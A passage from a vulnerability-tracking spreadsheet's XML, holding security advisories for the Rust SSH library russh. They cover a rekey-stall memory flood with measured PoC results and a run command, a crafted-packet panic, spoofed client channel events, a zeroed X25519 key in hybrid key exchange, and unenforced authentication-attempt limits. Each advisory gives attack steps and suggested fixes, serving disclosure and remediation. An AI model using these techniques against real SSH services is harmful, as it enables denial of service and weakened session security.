=== ATTACK (rekey stall) === (poc_server baseline_RSS=4208KB, N=800000)
  t=2s  server_RSS=667760KB
  t=4s  server_RSS=1599600KB
  t=6s  server_RSS=2556016KB
  t=8s  server_RSS=2566256KB   (flood done; memory retained)
=== CONTROL (no rekey) === (poc_server baseline_RSS=4208KB, N=800000)
  t=2s..t=12s  server_RSS=4208KB   (flat throughout)
```
- **ATTACK**: RSS `4,208 KB → 2,566,256 KB` (~2.57 GB) and retained after the
  flood ends — ~3.3 KB per `CHANNEL_OPEN`, attacker-driven. (An earlier canonical
  run reached 2.7 GB at 800k opens, and past 4.8 GB against the stock
  `echoserver` example at 1.5 M opens — see `results/canonical-run.log`.)
- **CONTROL**: RSS flat at `4,208 KB`. Without the rekey window the replies are
  drained normally; TCP backpressure (the client never reads the failure
  replies) even throttles the flood.
The control isolates the rekey window as the sole trigger. Both legs exercise
the real server entry point (`Session::run` → `reply` → `server_read_encrypted`)
over a real encrypted transport.
Reproduce: `C=russh-lab N=800000 ./poc/run.sh` (see `poc/POC-README.md`).
## Remediation
The priority queue carries locally generated channel-open replies, which are
non-kex messages the server **must not send** during a rekey anyway (RFC 4253
§7.1). So the fix is to bound how much channel work is done during a rekey, not
to drain the queue mid-rekey. Any of:
- **(recommended, minimal)** cap the number of non-kex messages processed while a
  rekey is in progress and disconnect a peer that exceeds it. A stalled/abusive
  rekey is then torn down after a small constant instead of growing memory
  without bound. See `patch/rekey-message-cap.patch` (a ~10-line change local to
  `Session::run`, validated in the lab — the attack leg is disconnected after the
  cap and RSS stays flat; a normal rekey, which completes in one round trip, is
  unaffected).
- bound / deferred-buffer channel messages during a rekey using the existing
  (currently dead) `pending_reads`/`pending_len` machinery, with a hard cap.
- bound the number of in-flight channel opens per connection and reject beyond it.
OpenSSH does not service new channels mid-kex; matching that intent closes the
whole family.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102821</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102822</t>
        </is>
      </c>
      <c r="D131" s="5" t="inlineStr"/>
      <c r="E131" s="5" t="inlineStr"/>
      <c r="F131" s="5" t="inlineStr"/>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M131" s="5" t="inlineStr">
        <is>
          <t>0.63.1</t>
        </is>
      </c>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr"/>
      <c r="P131" s="5" t="inlineStr"/>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>### Summary
`SshBlockCipher` implementations (AES-CBC, AES-CTR, 3DES-CBC, etc.) report `needs_mac() == true`, meaning they are documented/intended to always be paired with a separate integrity MAC. However, key-exchange negotiation only checks `needs_mac()` inside the *fallback* branch of MAC algorithm selection (used when no common MAC algorithm exists). If both peers' preferred MAC lists simply contain `none` and it is successfully negotiated through the normal selection path, nothing rejects pairing `none` with a cipher that requires a MAC. Once negotiated, a single crafted packet from either peer causes `cipher::read()` to shrink an already-allocated buffer below the number of bytes it is about to index, causing a Rust slice-index-out-of-range panic and killing that connection's task.
### Details
In `russh/src/cipher/mod.rs`, `read()` for a block cipher:
1. Reads `packet_length_to_read_for_block_length()` bytes up front (16 bytes for any `SshBlockCipher`) into `buffer.buffer`.
2. Decrypts the first block to recover the plaintext packet-length field `len`.
3. Computes `buffer.len = len + cipher.tag_len()`.
4. Calls `buffer.buffer.resize(buffer.len + 4, 0)`.
5. Immediately indexes `buffer.buffer[16..]` (via the constant used for the first block read) to continue decrypting/reading the rest of the packet.
When the negotiated MAC is `none`, `tag_len() == 0`. If the attacker (or a MITM holding the session key, or simply the accepting peer testing a hostile client) sends a packet whose *decrypted* length field is `0`, then `buffer.len = 0` and `resize(0 + 4, 0)` **shrinks** the buffer that was already grown to 16 bytes in step 1 down to 4 bytes. The subsequent slice operation `buffer.buffer[16..]` then panics with `range start index 16 out of range for slice of length 4`.
The file already defines a `MINIMUM_PACKET_LEN` constant, but it is only consulted on the *write*/padding side, never on the read path — so nothing prevents an incoming packet from declaring a length shorter than the bytes already buffered.
Negotiation gap: `negotiation.rs`'s `Select` MAC-selection logic only special-cases `needs_mac()` when negotiation would otherwise *fail* (no common MAC), substituting `none` only if the cipher does not need one. It never re-validates the case where `none` is a common/successfully-negotiated MAC on both sides regardless of what the chosen cipher requires. So an application (or a malicious peer, since negotiation is attacker-influenced on one side) that includes `none` in its own preferred MAC list — while still allowing the default CTR/CBC cipher suite — ends up with an invalid, panic-inducing combination that the library itself should refuse.
### PoC
1. Configure one side's `Preferred` config to include `mac::NONE` in the MAC list (this is a supported, non-default configuration exposed by the crate's public `Preferred` API — used e.g. for legacy/interop compatibility), while leaving the default cipher list (which includes `aes256-ctr`/`aes256-cbc`) untouched.
2. Complete a normal key exchange; negotiation lands on `{cipher: aes*-ctr (or -cbc), mac: none}` because `none` is present and preferred/common on both sides, and nothing during negotiation rejects this pairing.
3. From the peer, send one transport packet whose decrypted packet-length field is `0` (trivial to construct once the session keys are known to that peer, or for the peer that legitimately owns the connection to simply hand-craft, e.g. a modified client for testing).
4. `cipher::read()` on the receiving side panics: `range start index 16 out of range for slice of length 4`.
5. Because each connection is handled in its own `tokio::spawn`'ed task (see the per-connection `select!` loop that calls into `cipher::read()`), the panic unwinds only that task by default, but it unconditionally terminates that SSH connection/session — a working, currently-unauthenticated, already-established connection is killed with no attacker interaction beyond the one crafted packet, and the check runs on every inbound packet including pre-auth ones.
### Impact
Denial of service: a remote peer that can influence MAC preference negotiation (or a MITM in possession of the session key) can crash any individual SSH connection/session that ends up negotiating a block cipher together with `mac=none`, with a single crafted packet, pre-authentication. This does not affect the process as a whole (panic is scoped to that connection's task under `panic=unwind`), and does require a non-default configuration that permits `none` as a preferred MAC — hence Low severity.
### Suggested fix
In the MAC-selection logic in `negotiation.rs`, reject (or force substitution of) `mac::NONE` whenever the negotiated cipher's `needs_mac()` is `true`, regardless of *how* `none` came to be selected — not only in the "no common MAC" fallback branch. Defensively, `cipher::read()` could also refuse to shrink a buffer below the number of bytes already consumed for the length-field block, returning a protocol error instead of resizing blindly.
For credit/changelog purposes, please use: Yazan Balawneh, Cystack.ps</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102822</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102823</t>
        </is>
      </c>
      <c r="D132" s="5" t="inlineStr"/>
      <c r="E132" s="5" t="inlineStr"/>
      <c r="F132" s="5" t="inlineStr"/>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M132" s="5" t="inlineStr">
        <is>
          <t>0.63.1</t>
        </is>
      </c>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr"/>
      <c r="P132" s="5" t="inlineStr"/>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>### Summary
CVE-2026-68930 was fixed by adding `Session::is_established_channel()` in `russh/src/server/encrypted.rs`, which gates every channel-scoped SERVER-side message (CHANNEL_REQUEST, CHANNEL_DATA, CHANNEL_EOF, CHANNEL_CLOSE, CHANNEL_WINDOW_ADJUST, CHANNEL_EXTENDED_DATA) on `enc.channels.get(&amp;channel).is_some_and(|c| c.confirmed)` before invoking any `Handler` callback. The identical validation was never added to the CLIENT side (`russh/src/client/encrypted.rs`), which processes channel-scoped messages sent by the SSH SERVER once the client has authenticated.
### Details
In `client_read_authenticated` (`russh/src/client/encrypted.rs`, ~lines 431-757), for CHANNEL_DATA, CHANNEL_EXTENDED_DATA, CHANNEL_EOF, CHANNEL_CLOSE, CHANNEL_OPEN_FAILURE, CHANNEL_SUCCESS, CHANNEL_FAILURE, and the CHANNEL_REQUEST sub-types exit-status/exit-signal/xon-xoff, the code only optionally forwards the event to the internal per-channel mpsc sender via `if let Some(chan) = self.channels.get(&amp;channel_num) { ... }` (a no-op if the channel is unknown), but then **unconditionally** calls the corresponding public `Handler` trait method (`client.data(...)`, `client.exit_status(...)`, `client.channel_close(...)`, `client.channel_success(...)`, etc.) regardless of whether `channel_num` corresponds to any channel the client ever opened or that was ever confirmed. Only CHANNEL_OPEN_CONFIRMATION (closes the connection with `Error::Inconsistent` if unknown) and CHANNEL_WINDOW_ADJUST (returns early with `Ok(())` if unknown) correctly validate channel existence before acting.
Corroborating evidence this check was intended but never wired up: `crate::Error` defines a dedicated `WrongChannel` variant documented as "Message received/sent on unopened channel" (`russh/src/lib_inner.rs`, ~line 144-146), yet a repo-wide search shows this variant is never constructed or returned anywhere in the codebase — dead code left over from (or intended for) exactly this validation.
Because `Session::new_channel_id()` (`russh/src/session.rs`, ~line 708) allocates channel IDs sequentially starting at 1, a malicious or compromised SSH server can trivially predict the ID of the client's next channel and inject spoofed lifecycle events for it before or interleaved with the real channel-open exchange, or replay events for already-closed channel IDs.
### PoC
Many real-world consumers of russh-as-a-client (deployment/orchestration tools, CI runners connecting to build/bastion hosts, git-over-ssh style tooling, database/tunnel clients) implement the `client::Handler` trait directly and key their own state (e.g. `HashMap&lt;ChannelId, CommandState&gt;`, exit-code trackers, per-channel byte counters, completion futures) off the channel IDs the library hands them, trusting the documented contract that events like "The remote process has exited" (`exit_status`) or "Called when the server closes a channel" (`channel_close`) only fire for a channel the application itself opened.
A malicious, MITM'd (via a compromised/rogue jump host the client is configured to trust), or simply hostile SSH server can send `SSH_MSG_CHANNEL_REQUEST` (exit-status/exit-signal), `SSH_MSG_CHANNEL_DATA`, `SSH_MSG_CHANNEL_CLOSE`, `SSH_MSG_CHANNEL_SUCCESS`/`FAILURE`, or `SSH_MSG_CHANNEL_OPEN_FAILURE` for an arbitrary/predicted/never-opened channel ID at any point after authentication completes. Because the library invokes the `Handler` callback unconditionally, this reaches application code with an ID it never registered.
### Impact
(1) A reliable, purely protocol-level trigger for an application panic/DoS in any client that indexes per-channel state by `ChannelId` without itself re-checking channel validity — the exact class of bug CVE-2026-68930 fixed server-side; and (2) lets the server spoof exit-status/exit-signal/close/success/failure notifications for a channel the client has not yet opened or has already released, desynchronizing the client's command-completion bookkeeping (e.g. reporting a forged exit code 0 for a not-yet-run remote command, or a premature `channel_close` before real output/exit-status has arrived) — a business-logic-level integrity violation of the SSH channel lifecycle that automation built on russh implicitly relies on.
Suggested fix: add the same `is_established_channel()`-style gate already used in `server/encrypted.rs` to `client/encrypted.rs`'s `client_read_authenticated`, checking `self.channels.get(&amp;channel_num)` before invoking any `Handler` callback (not just the mpsc forward), for every channel-scoped message type.
For credit/changelog purposes, please use: Yazan Balawneh, Cystack.ps</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102823</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102824</t>
        </is>
      </c>
      <c r="D133" s="5" t="inlineStr"/>
      <c r="E133" s="5" t="inlineStr"/>
      <c r="F133" s="5" t="inlineStr"/>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M133" s="5" t="inlineStr">
        <is>
          <t>0.63.0</t>
        </is>
      </c>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr"/>
      <c r="P133" s="5" t="inlineStr"/>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>## Vulnerability
The hybrid ML-KEM 768 + X25519 key exchange implementation in `russh/src/kex/hybrid_mlkem.rs` does not validate that the remote peer's X25519 public key is not the zero point (all-zero 32-byte value). This allows a remote peer to force the X25519 contribution to the combined shared secret to zero, reducing the hybrid KEX to a single-algorithm exchange.
Affected code at HEAD (v0.62.4, commit 0089c89):
**Server-side** (`server_dh`, lines 92-93):
```rust
let mut c_pk1 = MontgomeryPoint([0; 32]);
c_pk1.0.copy_from_slice(c_pk1_bytes);
// No zero-point check - proceeds to: let k_cl = s_secret * c_pk1;
```
**Client-side** (`compute_shared_secret`, lines 154-155):
```rust
let mut s_pk1 = MontgomeryPoint([0; 32]);
s_pk1.0.copy_from_slice(s_pk1_bytes);
// No zero-point check - proceeds to: let k_cl = x25519_secret * s_pk1;
```
## Root Cause
Commit a7fc1eb (2026-07-22, "fix mpint encoding and validate curve25519 keys") added zero-point validation to the standalone Curve25519 KEX in `russh/src/kex/curve25519.rs` at two locations:
- `server_dh` line 77: `if client_pubkey.0 == [0u8; 32] { return Err(crate::Error::Kex); }`
- `compute_shared_secret` line 122: `if remote_pubkey.0 == [0u8; 32] { return Err(crate::Error::Kex); }`
The same X25519 scalar multiplication pattern appears in `hybrid_mlkem.rs`, but the fix was not applied there.
## Proof of Concept
A malicious SSH client negotiating `mlkem768x25519-sha256` can send a KEX_HYBRID_INIT message containing a valid ML-KEM 768 encapsulation key followed by 32 zero bytes as the X25519 component.
When the server computes `k_cl = s_secret * c_pk1`, the result is the zero point regardless of the server's secret scalar. The combined shared secret `K = SHA-256(k_pq || k_cl)` then depends only on the ML-KEM component. The same attack works in reverse against a client connecting to a malicious server.
The zero X25519 public key passes all existing validation (the length check on line 78 succeeds since 32 bytes is correct). No panic or crash occurs - the exchange completes successfully with a weakened shared secret.
## Impact
The purpose of hybrid key exchange is defense-in-depth: if either the classical algorithm (X25519) or the post-quantum algorithm (ML-KEM 768) is broken, the combined secret remains secure. By injecting a zero X25519 public key, an attacker eliminates the classical contribution entirely, reducing security to depend solely on ML-KEM.
This matters in two scenarios:
1. If ML-KEM 768 is later found to have a weakness (the explicit threat model hybrid KEX is designed to mitigate), sessions where the X25519 component was zeroed out lose their fallback protection.
2. An active network attacker who can intercept KEX could downgrade the hybrid exchange to effectively single-algorithm security without either peer detecting it.
The severity is MEDIUM rather than HIGH because the ML-KEM component still provides strong security today, and an active attacker who can modify KEX messages can already perform other attacks unless strict KEX is negotiated.
## Suggested Fix
Add zero-point checks in `hybrid_mlkem.rs` matching the ones in `curve25519.rs`:
```rust
// In server_dh, after line 93:
let mut c_pk1 = MontgomeryPoint([0; 32]);
c_pk1.0.copy_from_slice(c_pk1_bytes);
if c_pk1.0 == [0u8; 32] {
    return Err(Error::Kex);
}
// In compute_shared_secret, after line 155:
let mut s_pk1 = MontgomeryPoint([0; 32]);
s_pk1.0.copy_from_slice(s_pk1_bytes);
if s_pk1.0 == [0u8; 32] {
    return Err(Error::Kex);
}
```
Ideally, also validate against the other small-subgroup points on Curve25519 (there are a small number of low-order points that also yield a zero shared secret), matching the comprehensive validation OpenSSH performs.
### AI tooling
AI assistancewas used for the code audit and for drafting this report. The finding was manually verified against the project's source at the location cited above before reporting it, and the severity and impact assessment are my own.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102824</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102825</t>
        </is>
      </c>
      <c r="D134" s="5" t="inlineStr"/>
      <c r="E134" s="5" t="inlineStr"/>
      <c r="F134" s="5" t="inlineStr"/>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M134" s="5" t="inlineStr">
        <is>
          <t>0.62.6</t>
        </is>
      </c>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr"/>
      <c r="P134" s="5" t="inlineStr"/>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>### Details
#### Affected versions and vulnerable location
- Confirmed present on default branch `main` at HEAD `0089c89c94753bebbec12b956c07a1cd38740379`.
- Crate version at HEAD: `0.62.4`.
- Vulnerable locations on current default branch:
  - `russh/src/server/mod.rs:91` (`pub max_auth_attempts: usize`)
  - `russh/src/server/mod.rs:121` (default `max_auth_attempts: 10`)
  - `russh/src/server/encrypted.rs:89` (`USERAUTH_REQUEST` dispatch into auth handler path)
  - `russh/src/server/encrypted.rs:98` (`self.common.auth_attempts += 1`)
  - `russh/src/server/encrypted.rs:53` (only runtime read of `auth_attempts`, used for initial reject timing, not attempt limiting)
- Default-branch history check did not show a newer merged commit adding enforcement against `config.max_auth_attempts`.
#### Reachability trace verified
1. Entry point: exported server API `server::run_stream` in `russh/src/server/mod.rs:1049`.
2. Session run loop in `russh/src/server/session.rs` processes incoming packets and calls `reply(...)` (`server/session.rs:725`).
3. `reply` forwards encrypted packets to `session.server_read_encrypted(...)` (`server/mod.rs:1221`).
4. `server_read_encrypted` routes `USERAUTH_REQUEST` to `enc.server_read_auth_request(...)` (`server/encrypted.rs:89`).
5. On each request, `self.common.auth_attempts += 1` executes (`server/encrypted.rs:98`).
6. No comparison against `self.common.config.max_auth_attempts` is present in this runtime flow.
### PoC
#### Reproduction steps and observed output
I did not run a full server process in this environment because Rust tooling is unavailable. I verified the issue from source and command output on the audited tree.
1. Show where `max_auth_attempts` appears:
```bash
rtk rg -n "max_auth_attempts" .scratch/russh/russh/src/server/mod.rs .scratch/russh/russh/src/server/encrypted.rs .scratch/russh/russh/src/server/session.rs
```
Observed:
```text
.scratch/russh/russh/src/server/mod.rs:91:    pub max_auth_attempts: usize,
.scratch/russh/russh/src/server/mod.rs:121:            max_auth_attempts: 10,
.scratch/russh/russh/src/server/mod.rs:148:            .field("max_auth_attempts", &amp;self.max_auth_attempts)
```
2. Show runtime auth-attempt handling:
```bash
rtk rg -n "auth_attempts == 0|auth_attempts \\+= 1" .scratch/russh/russh/src/server/encrypted.rs
```
Observed:
```text
53:        let initial_none_rejection_wait_until = if self.common.auth_attempts == 0 {
98:                self.common.auth_attempts += 1;
```
3. Show production entrypoint-to-auth path references:
```bash
rtk rg -n "pub async fn run_stream|match reply\\(|server_read_encrypted\\(|server_read_auth_request\\(" .scratch/russh/russh/src/server/mod.rs .scratch/russh/russh/src/server/session.rs .scratch/russh/russh/src/server/encrypted.rs
```
Observed:
```text
.scratch/russh/russh/src/server/encrypted.rs:89:                enc.server_read_auth_request(
.scratch/russh/russh/src/server/session.rs:725:                            match reply(&amp;mut self, &amp;mut handler, &amp;mut pkt).await {
.scratch/russh/russh/src/server/mod.rs:1049:pub async fn run_stream&lt;H, R&gt;(
.scratch/russh/russh/src/server/mod.rs:1221:    session.server_read_encrypted(handler, pkt).await
```
4. Toolchain check:
```bash
cargo --version
```
Observed:
```text
/bin/bash: line 1: cargo: command not found
```
### Impact
#### Attacker model
- Attacker: unauthenticated remote client with TCP reachability to a russh-backed SSH service.
- Preconditions: deployer expects `server::Config.max_auth_attempts` to cap attempts.
- Impact: repeated `USERAUTH_REQUEST` attempts continue for a single connection beyond configured limit, increasing online guessing opportunity and backend auth workload.
### Suggested fix
Enforce `max_auth_attempts` in the `USERAUTH_REQUEST` branch before invoking auth-method handlers, and fail closed once threshold is reached.
Concrete patch direction in `russh/src/server/encrypted.rs`:
```rust
if self.common.config.max_auth_attempts &gt; 0
    &amp;&amp; self.common.auth_attempts &gt;= self.common.config.max_auth_attempts
{
    self.common.disconnect(
        Disconnect::NoMoreAuthMethodsAvailable,
        "Too many authentication attempts",
        "",
    )?;
    return Ok(());
}
```
### How it was found and a note on tooling
The researcher synthesized three lens outputs, then revalidated each claim against current `main`: source presence and commit history, advisory overlap checks in both GitHub advisories and OSV, entrypoint-to-sink reachability, attacker-model realism, and execution-claim integrity. The researcher used `gh`, `git`, `rg`, and direct source inspection under `.scratch/russh`. Because Rust tooling is unavailable in this worker, this report is intentionally marked `source-only`.
AI assistance was used while investigating this and while drafting this report. The finding was verified by reading the cited code at HEAD. The vulnerability was not executed it, and that limit is stated plainly above rather than left implied.
Credits: arpitjain099.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102825</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T134"/>
  <conditionalFormatting sqref="E2:E13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3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2026-10-01T06:36:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-01T06:36:56Z</dcterms:modified>
</cp:coreProperties>
</file>